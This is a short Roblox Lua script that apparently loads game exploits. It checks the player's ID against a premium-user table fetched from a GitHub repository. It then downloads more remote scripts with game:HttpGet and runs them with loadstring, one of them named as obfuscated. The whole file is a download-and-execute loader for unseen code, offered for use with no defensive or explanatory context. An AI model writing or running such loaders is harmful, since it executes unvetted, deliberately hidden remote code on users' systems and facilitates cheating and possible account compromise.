local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer

local PremiumUsers = loadstring(game:HttpGet("https://raw.githubusercontent.com/qwer123476/12345/main/PM"))()

if PremiumUsers[LocalPlayer.UserId] then
    
    loadstring(game:HttpGet("https://raw.githubusercontent.com/qwer123476/12345/main/k12"))()
else
    
    loadstring(game:HttpGet("https://raw.githubusercontent.com/qwer123476/12345/main/anti"))()
end


loadstring(game:HttpGet("https://raw.githubusercontent.com/qwer123476/12345/main/obfuscated_script.lua.txt1"))()
